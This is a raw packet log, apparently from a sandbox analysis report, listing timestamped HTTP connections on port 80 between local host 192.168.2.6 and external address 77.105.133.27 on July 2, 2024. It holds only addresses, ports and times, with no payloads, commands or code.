Jul 2, 2024 00:05:08.060394049 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060403109 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060414076 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060424089 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060434103 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060444117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060452938 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060462952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060463905 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060463905 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060478926 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060492992 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060492992 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060498953 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060508966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060518980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060523033 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060528994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060539007 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060548067 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060549021 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060559034 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060570002 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060580969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060585976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060585976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060606956 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060633898 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060723066 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060734034 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060744047 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060754061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060762882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060772896 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060782909 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060784101 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060792923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060802937 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060810089 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060810089 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060818911 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060823917 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060830116 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060839891 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060849905 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060859919 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060870886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060878992 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060878992 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060879946 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060885906 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060890913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060899973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060900927 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060911894 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060936928 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060949087 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061532974 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061542988 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061553001 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061564922 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061574936 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061585903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061585903 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061587095 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061595917 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061605930 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061615944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061629057 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061631918 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061642885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061650991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061661959 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061662912 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061671972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061681986 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061686039 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061686039 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061692953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061702967 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061712980 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061722994 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061733007 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.061739922 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061739922 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061774969 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.061774969 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062530994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062541962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062551975 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062562943 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062572956 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062583923 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062589884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062589884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062593937 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062604904 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062613964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062624931 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062627077 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062654972 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062654972 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062695026 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062771082 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062781096 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062791109 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062800884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062810898 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062819958 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062822104 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062830925 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062833071 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062843084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062854052 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062865019 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062869072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062880039 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062887907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062895060 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062895060 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062899113 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062908888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062918901 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062928915 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062939882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062948942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062956095 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062956095 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.062961102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.062968969 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063014030 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063498974 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063510895 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063520908 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063529968 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063534021 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063541889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063551903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063556910 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063561916 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063571930 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063581944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063592911 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063602924 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063602924 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063610077 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063621044 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063627005 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063631058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063641071 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063656092 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063666105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063668013 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063668013 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063677073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063687086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063697100 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063700914 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063707113 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063718081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063728094 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063738108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063739061 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063747883 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063749075 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063759089 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063769102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.063776016 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063797951 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.063826084 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064361095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064372063 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064382076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064393044 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064403057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064413071 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064419031 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064419031 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064424038 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064471960 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064471960 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064610004 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064620018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064630985 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064640999 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064652920 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064661980 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064688921 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064704895 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064729929 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064742088 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064752102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064763069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064778090 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064789057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064799070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064807892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064807892 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064807892 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064819098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064829111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064836025 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064838886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064848900 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064858913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064870119 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064870119 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064870119 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064879894 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064891100 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064891100 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064903021 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.064923048 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064923048 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.064949989 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065495968 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065506935 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065516949 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065526962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065534115 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065537930 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065547943 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065557957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065562963 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065567970 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065578938 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065587997 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065598965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065604925 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065604925 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065622091 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065646887 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065829992 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065840960 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065850973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065861940 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065867901 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065875053 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065885067 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065895081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065896988 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065896988 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065905094 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065916061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065924883 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065932989 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065937042 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065948009 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.065959930 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065959930 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.065994024 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066256046 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066267014 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066278934 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066288948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066299915 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066303968 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066310883 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066319942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066330910 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066339016 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066340923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066351891 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066359043 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066359043 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066363096 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066374063 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066390038 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066420078 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066692114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066704035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066713095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066724062 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066735029 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066740990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066745996 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066759109 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066768885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066771984 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066780090 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066791058 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066797018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066811085 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066819906 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066823006 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066828012 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066833019 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066834927 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066843987 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066854000 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066863060 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066873074 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066873074 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066883087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066893101 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066904068 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066912889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066920042 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066920042 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066922903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066932917 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.066934109 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066987991 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.066987991 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.067363024 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.067389011 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.067399025 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.067414045 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.067430019 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.067444086 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.067451954 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.067476034 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.068403959 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068443060 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.068456888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068469048 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068511009 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.068530083 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068541050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068551064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068561077 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068571091 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.068600893 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.068723917 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068736076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068746090 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068756104 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068766117 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068775892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068785906 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068794012 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.068794012 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.068795919 CEST	80	49714	77.105.133.27	192.168.2.6
